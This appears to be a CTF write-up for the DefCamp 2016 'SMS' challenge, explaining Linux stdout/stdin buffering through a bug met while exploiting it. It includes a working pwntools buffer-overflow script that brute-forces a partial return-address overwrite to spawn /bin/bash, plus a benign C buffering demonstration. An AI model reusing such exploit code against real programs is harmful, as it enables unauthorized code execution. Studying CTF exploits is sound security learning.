The article http://www.pixelbeat.org/programming/stdio_buffering/ describes how Linux buffers stdin/stdout/stderr:
1. stderr is unbuffered.
2. When stdin and stdout are connected to a terminal they are line buffered with a 1024-byte buffer; otherwise they are block buffered with a 4K buffer.
A bug I hit while writing the exploit for DefCamp CTF Finals 2016 SMS/SMS deepened my understanding of Linux buffering once more.
Function call chain: main() -> dosms() -> 1. set_user(), 2. set_sms()
1. main():
puts the following:
--------------------------------------------
| Welcome to Defcamp SMS service |
--------------------------------------------
2. set_user():
1. puts("Enter your name")
2. printf("> ")
3. printf("Hi,%s"), printing the name that was entered
3. set_sms():
1. puts("SMS our leader")
2. printf("> ")
4. dosms():
1. puts("SMS delivered")
The exploit follows:
from pwn import *
context.clear(arch='amd64')
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
i = 0
while True:
    i += 1
    io = process('/root/Downloads/ctf/sms/200.bin')
    # By the time execution gets here, main()'s puts() and the first puts() in
    # set_user() have been output, but because stdout is line buffered the
    # printf("> ") has not; a recvuntil("> ") here would certainly hang.
    x = io.recv()
    print x
    print x.encode('hex')
    payload = 'a' * 40
    payload += '\xca'
    # stdin is line buffered: the payload does not get through and does not
    # trigger the printf("> ") in set_user(); the only option here is
    # sendline(payload).
    io.send(payload)
    y = io.recv()
    print y
    print y.encode('hex')
    p2 = 'a' * 200
    p2 += '\x01\xA9'
    io.send(p2)
    print io.recv()
    try:
        io.recv(timeout=1)
    except EOFError as e:
        io.close()
        print("try num is : %d\n" % i)
        continue
    else:
        sleep(0.1)
        io.sendline("/bin/bash" + '\0')
        sleep(0.1)
        io.interactive()
        break
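To make the buffering behaviour in the comments above concrete, here is an added C example (not code from the post or from the challenge binary) that writes the same puts("Enter your name") / printf("> ") sequence into a pipe under each stdio mode and counts how many bytes a reader on the other end, such as a script calling recv(), actually sees. It goes beyond the post by also showing glibc's default for a pipe (block buffered, so nothing arrives) and what fflush() changes; the function name and the 256-byte read buffer are my own choices.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

/* Read whatever is currently in the pipe without blocking (fd is O_NONBLOCK). */
static ssize_t drain(int fd, char *buf, size_t sz)
{
    ssize_t n = read(fd, buf, sz);
    if (n < 0 && (errno == EAGAIN || errno == EWOULDBLOCK))
        return 0;                       /* nothing has reached the pipe yet */
    return n;
}

/* Write "Enter your name\n" (as puts() does) and then the prompt "> " (as
 * printf() does) into a pipe through a FILE* in the given stdio mode, and
 * return how many bytes the reader can see. mode < 0 keeps glibc's default,
 * which for a pipe is block buffering. Returns -1 on setup failure. */
int visible_after_prompt(int mode, int do_flush)
{
    int fds[2];
    char buf[256];
    if (pipe(fds) != 0)
        return -1;
    fcntl(fds[0], F_SETFL, fcntl(fds[0], F_GETFL) | O_NONBLOCK);
    FILE *w = fdopen(fds[1], "w");
    if (w == NULL)
        return -1;
    if (mode >= 0)
        setvbuf(w, NULL, mode, BUFSIZ); /* must be set before any output */
    fputs("Enter your name\n", w);      /* 16 bytes, ends in a newline */
    fputs("> ", w);                     /* 2 bytes, no newline */
    if (do_flush)
        fflush(w);
    ssize_t n = drain(fds[0], buf, sizeof buf);
    fclose(w);                          /* flushes the remainder; discarded */
    close(fds[0]);
    return (int)n;
}

int main(void)
{
    printf("default (pipe)    : %d bytes\n", visible_after_prompt(-1, 0));
    printf("_IOLBF, no fflush : %d bytes\n", visible_after_prompt(_IOLBF, 0));
    printf("_IONBF            : %d bytes\n", visible_after_prompt(_IONBF, 0));
    printf("_IOLBF + fflush   : %d bytes\n", visible_after_prompt(_IOLBF, 1));
    return 0;
}
```

The line-buffered case is exactly what the exploit's first recv() sees: the puts() line arrives, the "> " prompt stays in the buffer until a newline, an fflush() or exit, which is why waiting for the prompt hangs.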